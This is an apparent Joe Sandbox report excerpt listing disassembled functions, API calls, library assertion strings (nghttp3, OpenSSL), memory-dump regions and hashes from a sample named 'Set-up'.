                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _assert
                                    • String ID: nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len$nghttp3_qpack.c
                                    • API String ID: 1222420520-645767172
                                    • Opcode ID: 1f3e8453312123aad4bd6e7d6b6a2dc20e480a866e3732b67103b7013ed16312
                                    • Instruction ID: c8c03b6eea5ac9dc63a79fc1241ef993d32a150d4b23b28d4fdcf533482eeed1
                                    • Opcode Fuzzy Hash: 1f3e8453312123aad4bd6e7d6b6a2dc20e480a866e3732b67103b7013ed16312
                                    • Instruction Fuzzy Hash: 5651D675E043144FD704AE2CD880B2AB7D6FF98314F19467CEC989B382EA35DD058BA1
                                    APIs
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(?,00000000,00CF836A,?,?,0000012C,000000FF), ref: 00E749BA
                                      • Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37262
                                      • Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37285
                                      • Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372C5
                                      • Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strcpystrlen$_time64
                                    • String ID: OCSP_check_validity$crypto/ocsp/ocsp_cl.c
                                    • API String ID: 3821555430-713967112
                                    • Opcode ID: bc18245b2035634df48dbb6700951eb78aaa467552c433531e85c2599018aac6
                                    • Instruction ID: d64344434228534a4e7b5e31e4ff47544f61f0eb15f1fd9f22e88968f7634bea
                                    • Opcode Fuzzy Hash: bc18245b2035634df48dbb6700951eb78aaa467552c433531e85c2599018aac6
                                    • Instruction Fuzzy Hash: 3141C1F6F4831577D7207A25AC46B5B3B958F84758F049428FD8CB73C2E675E90082A2
                                    APIs
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,?,?,?,?), ref: 00D2468C
                                    Strings
                                    • tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 00D24687
                                    • nghttp3_conn.c, xrefs: 00D24682
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _assert
                                    • String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
                                    • API String ID: 1222420520-4133914617
                                    • Opcode ID: 5c9b66cfac41e7940881caf78ccd0c9415b81fc286fef5e9b39bb4c0dc66f3b6
                                    • Instruction ID: 964599f64cc09b031b4219690e0d3c6ae79923ecd5dd7fd5fe77024f39c51283
                                    • Opcode Fuzzy Hash: 5c9b66cfac41e7940881caf78ccd0c9415b81fc286fef5e9b39bb4c0dc66f3b6
                                    • Instruction Fuzzy Hash: 8631F4716002116BD210DA29FC85EABB7ECEFD6369F080629FD58C3281E731E814C7B1
                                    APIs
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 00D244B7
                                    Strings
                                    • tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 00D244B2
                                    • nghttp3_conn.c, xrefs: 00D244AD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _assert
                                    • String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
                                    • API String ID: 1222420520-4133914617
                                    • Opcode ID: 5e9ae20f9159245a569b18e2c4a3907ec644a850aa3d5d8bfd83dac2d9498ecd
                                    • Instruction ID: 9544f2d9d683504f92975881130e75cc49d77a19bad2fca574c5078ad8cb04f0
                                    • Opcode Fuzzy Hash: 5e9ae20f9159245a569b18e2c4a3907ec644a850aa3d5d8bfd83dac2d9498ecd
                                    • Instruction Fuzzy Hash: 2521F272100721ABEB116A65ED01F6777DEDFA4329F080468FD18C6162FB76D4158771
                                    APIs
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00FFA161
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00FFA2D1
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00FFA3EC
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00FFA499
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: memcpy
                                    • String ID:
                                    • API String ID: 3510742995-0
                                    • Opcode ID: 09734a971d87862f1d040c4db9cb224f07ce9b8a4e7fa16dbcd3f142039f386a
                                    • Instruction ID: 9de0153a2168b9e59dce42ffa9d654dfc57f3f0f7b38f06b0aad36f8e85fbf70
                                    • Opcode Fuzzy Hash: 09734a971d87862f1d040c4db9cb224f07ce9b8a4e7fa16dbcd3f142039f386a
                                    • Instruction Fuzzy Hash: 6CC19FB2A043149FCB04DF28C8C4A6A7BE5BF88314F1545ADEA498B366D771EC40DF96
                                    APIs
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < len || offset == 0,nghttp3_stream.c,00000371,00000000,00CFD7A7,?,?,00CFD7A7), ref: 00D261CF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _assert
                                    • String ID: i < len || offset == 0$nghttp3_stream.c
                                    • API String ID: 1222420520-1528673747
                                    • Opcode ID: 0b0267d26cc0e729135885eeb52dba560bcc1e3b74d951efc53036e1b7010848
                                    • Instruction ID: 3107dc3b556346189f9e01da5b3d9ae2b00319e6b6e39e5764e6e681e18f7b5d
                                    • Opcode Fuzzy Hash: 0b0267d26cc0e729135885eeb52dba560bcc1e3b74d951efc53036e1b7010848
                                    • Instruction Fuzzy Hash: CD11C4755043108FD305EF29D888FAA77E4FF98324F0904BDE94847353DA31A945CBA1
                                    APIs
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((blklen & 0xfu) == 0,nghttp3_balloc.c,00000022,00D288D3,00000010,?,?,00000000,00D29AE3,00D2ACDD,-00000010,?,?,?,00000000,?), ref: 00D2873C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _assert
                                    • String ID: (blklen & 0xfu) == 0$nghttp3_balloc.c
                                    • API String ID: 1222420520-1502420682
                                    • Opcode ID: 12a7bf861f100fbe8c5bc1e7188e31d7634d6e82762b26a2c3e56707688dfe25
                                    • Instruction ID: 46aa5f186d67ce9d5391200a66938d3279104a5d7a5037b248a72e7ca4e65f23
                                    • Opcode Fuzzy Hash: 12a7bf861f100fbe8c5bc1e7188e31d7634d6e82762b26a2c3e56707688dfe25
                                    • Instruction Fuzzy Hash: E311D679A0A3505FC3229F14EC41B56BFB1AFA2718F1D849DE848AB297D7309C04D771
                                    APIs
                                    • _byteswap_uint64.API-MS-WIN-CRT-UTILITY-L1-1-0(FFFFFF3F,?,nghttp3_conv.c,0000003D,nghttp3_get_varint,00D25084,?,?), ref: 00D28A31
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _byteswap_uint64
                                    • String ID: nghttp3_conv.c$nghttp3_get_varint
                                    • API String ID: 1624361598-912089391
                                    • Opcode ID: 7454569e2fb3f4f894e49a03bf0d9b7ba34d5e53071f1ebdde23890b69a1a957
                                    • Instruction ID: ab5c66796fdab8b5822f92388c18ffd29a38df08b9aba86143c1ce5a400797f9
                                    • Opcode Fuzzy Hash: 7454569e2fb3f4f894e49a03bf0d9b7ba34d5e53071f1ebdde23890b69a1a957
                                    • Instruction Fuzzy Hash: 75F02BB25110525BD704DF39E881939B7D2EBA3312F4CC2E5F494CA4C8CB74C991E720
                                    APIs
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rcbuf->ref > 0,nghttp3_rcbuf.c,0000005E,00D30B2D,5308C483,00000000,00D24D9F,?,00D20EC8), ref: 00D20333
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _assert
                                    • String ID: nghttp3_rcbuf.c$rcbuf->ref > 0
                                    • API String ID: 1222420520-1879435254
                                    • Opcode ID: 1a1b485eec004e44c4d8d1a557b69be3e7d331b8dd02dff8ed19f3db26e5a0a3
                                    • Instruction ID: 1afc55e54f60020e2f1e4a45313bc5b6d9543b7e4435dedb17a1303052049d50
                                    • Opcode Fuzzy Hash: 1a1b485eec004e44c4d8d1a557b69be3e7d331b8dd02dff8ed19f3db26e5a0a3
                                    • Instruction Fuzzy Hash: 21E030382006049FCA14CB08E955E25BBA5AFA971AF9CC19CF40887293D771DC01DA21
                                    APIs
                                      • Part of subcall function 00E59F60: GetStdHandle.KERNEL32(000000F4), ref: 00E59F76
                                      • Part of subcall function 00E59F60: GetFileType.KERNEL32(00000000), ref: 00E59F83
                                      • Part of subcall function 00E59F60: WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 00E59FBB
                                    • raise.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000016,00E5D8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,00E5DF70,?,?,?,?,?,?,?,00000000), ref: 00E5A18B
                                    • _exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000003,?,00E5D8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,00E5DF70,?,?,?,?,?,?,?), ref: 00E5A195
                                    Strings
                                    • %s:%d: OpenSSL internal error: %s, xrefs: 00E5A17C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: File$HandleTypeWrite_exitraise
                                    • String ID: %s:%d: OpenSSL internal error: %s
                                    • API String ID: 2477291680-569889646
                                    • Opcode ID: 8a92887959107d191775d9e90bdf9fc9e625470af2e996075ba2a5e0635a602f
                                    • Instruction ID: b9d8582b774ca2603fda1f1b2973a8b1d30a031990acfcc066e8154d5c9671ff
                                    • Opcode Fuzzy Hash: 8a92887959107d191775d9e90bdf9fc9e625470af2e996075ba2a5e0635a602f
                                    • Instruction Fuzzy Hash: 15C01272E4434AABFB037ED04C02ABAB665BF75700F086D1EB698240D2D6639538B617
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00C8F9BB,00000000,00C95F07,?,?,00C8F9BB,?), ref: 01004266
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00C8F9BB,00000000,00C95F07,?,?,00C8F9BB,?), ref: 0100427A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00C8F9BB,00000000,00C95F07,?,?,00C8F9BB,?), ref: 01004285
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00C8F9BB,00000000,00C95F07,?,?,00C8F9BB,?), ref: 01004290
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 25ffd014e2f6ed68e05ae34b745ed91c47a2600365e3d824e6176cbd5d9e1e58
                                    • Instruction ID: d1a8b848e9fa7eafc5d7729924882f05905aba995e10c4a161cb02d5c81f1413
                                    • Opcode Fuzzy Hash: 25ffd014e2f6ed68e05ae34b745ed91c47a2600365e3d824e6176cbd5d9e1e58
                                    • Instruction Fuzzy Hash: 5E01A276A002018FFA62AB58E44094BB7D4AFA0220F0AC47AD5C5CB2A1D630E8408B81